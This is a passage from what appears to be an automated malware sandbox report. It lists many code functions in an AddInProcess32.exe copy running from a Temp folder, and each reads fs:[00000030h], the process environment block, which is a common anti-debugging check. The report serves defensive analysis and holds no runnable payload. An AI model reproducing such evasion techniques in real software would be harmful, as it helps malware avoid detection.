          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01364D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01364D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01364D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01354120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01354120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01354120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01354120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01354120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01339100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01339100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01339100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01357D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01408D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01373D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B3540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01361DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01361DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01361DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B51BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013661A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013635A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B69A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01362990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01362581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01332D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013E8DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013C41E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134D5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013FFDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_014005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_014005AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B7016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01401074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0140740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0140740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0140740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01404015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01404015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01350050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01350050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CC450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01408CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013620A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013790AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01339080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B3884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B6CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013358EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CB8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CB8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01408B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01334F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01334F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135F716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01408F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013CFF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01363B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01363B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0140070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0140070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134FF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134EF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01364BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01364BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01364BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01348794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01362397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B7794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01341B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01341B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013ED380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013737F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013603E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01405BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013B53CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013EFE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133E620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01374A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01408A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01335210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01335210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01335210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01335210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01353A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0136A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0133C600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01368E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013F1608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01348A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0135AE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0137927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_0134766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013EB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013FEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013C4257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01339240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01339240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01339240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01339240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_01347E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013FAE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\AppData\Local\Temp\AddInProcess32.exeCode function: 1_2_013FAE44 mov eax, dword ptr fs:[00000030h]
